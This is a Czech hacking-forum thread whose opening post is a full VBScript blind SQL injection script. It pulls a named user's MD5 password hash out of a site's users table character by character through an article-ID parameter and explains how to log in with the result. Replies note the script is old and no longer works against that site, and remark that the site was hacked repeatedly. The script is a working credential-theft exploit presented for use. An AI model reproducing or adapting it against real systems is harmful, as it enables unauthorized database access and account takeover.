Jsem neved ze Soom byl hacknut ?!

HackForum

Jsem neved ze Soom byl hacknut ?!#
Option Explicit

' Script zjisti heslo z databaze pro zadany login. Heslo je ulozene ve forme
' MD5 hashe. Po ziskani hesla je z neho potreba 3x vypocitat MD5 hash. MD5(MD5(MD5($heslo))).
' Prihlaseni se pak provede nasledovne:
' [link]

Const passwordLength = 32

Const articleTrueId = 174
Const articleTrueText = "WWWhack"

Const articleFalseId = 171
Const articleFalseText = "Nslookup"

Dim scriptName, login

Main

Function charCodeSeq(ByVal chars)
Dim i,length

length = Len(chars)
charCodeSeq = "CONCAT("
For i = 1 To length - 1
charCodeSeq = charCodeSeq & "CHAR(" & Cstr(Asc(Mid(chars,i,1))) & "),"
Next
If length > 0 Then
charCodeSeq = charCodeSeq & "CHAR(" & Cstr(Asc(Mid(chars,length,1))) & ")"
End if
charCodeSeq = charCodeSeq & ")"
End Function

Function testCharVal(ByVal offset,ByVal operator,ByVal value)
Dim XHR, t, v, url

Set XHR = CreateObject("MSXML2.XMLHTTP")

t = "ASCII(SUBSTRING((SELECT heslo FROM users WHERE UPPER(login) = " & charCodeSeq(UCase(login)) & ")," & Cstr(offset) & ",1)) " & operator & " " & Cstr(value)
v = "IF(" & t & "," & CStr(articleTrueId) & "," & CStr(articleFalseId) & ")"
url = "[link]" & Escape(v)

XHR.Open "GET",url,False
XHR.Send NULL

If InStr(XHR.responseText,articleTrueText) Then
testCharVal = True
ElseIf InStr(XHR.responseText,articleFalseText) Then
testCharVal = False
Else
Err.Raise 1, scriptName & ".testCharVal", "Nepredvidana odpoved serveru"
End if

End Function

Function findChar(ByVal offset,Byval l,ByVal r)
Dim m,c

Do While r >= l
m = (l + r) \ 2
If testCharVal(offset,"<",m) Then
r = m - 1
ElseIf testCharVal(offset,">",m) Then
l = m + 1
ElseIf testCharVal(offset,"=",m) Then
findChar = Chr(m)
Exit Function
Else
findChar = False
Exit Function
End if
Loop

findChar = False
End Function

Sub Main()
Dim FSO
Dim i,r,password

If WScript.arguments.length <> 1 Then
WScript.Echo "Syntaxe: " & scriptName & " login"
WScript.Quit 1
End if

scriptName = WScript.ScriptName
login = WScript.arguments(0)

WScript.Echo "Login: " & login
WScript.Echo "Delka hesla: " & passwordLength
WScript.Echo ""

For i = 1 To passwordLength
r = findChar(i,0,255)
If VarType(r) = vbString Then
WScript.Echo "Pocet zjistenych znaku " & i & " z " & passwordLength
password = password & r
WScript.Echo "Heslo: " & password & String(passwordLength - i,"?")
Else
WSCript.Echo "Nepodarilo se zjistit znak"
Exit Sub
End if
Next


End Sub
'[link]
(odpovědět)
qwest | 85.207.107.*17.2.2007 16:16
re: Jsem neved ze Soom byl hacknut ?!#
To uz je daavno a toto je sysluv script, dnes uz je heslo na soomu kryptovano uplne jinym zpusobem, takze toto samozrejme nefunguje.
(odpovědět)
Dark Craft | PGP17.2.2007 16:44
re: Jsem neved ze Soom byl hacknut ?!#
qwest? Šok? Ztracené ideálý? Mám pro tebe špatnou zprávu. soom byl hacknut vícekrát

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website18.2.2007 20:35
re: Jsem neved ze Soom byl hacknut ?!#
Se pozna kdo je tu chvili ;) Jinak by vedel :)

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t18.2.2007 21:22

Zpět
Svou ideální brigádu na léto najdete na webu Ideální brigáda
 
 
 

 
BBCode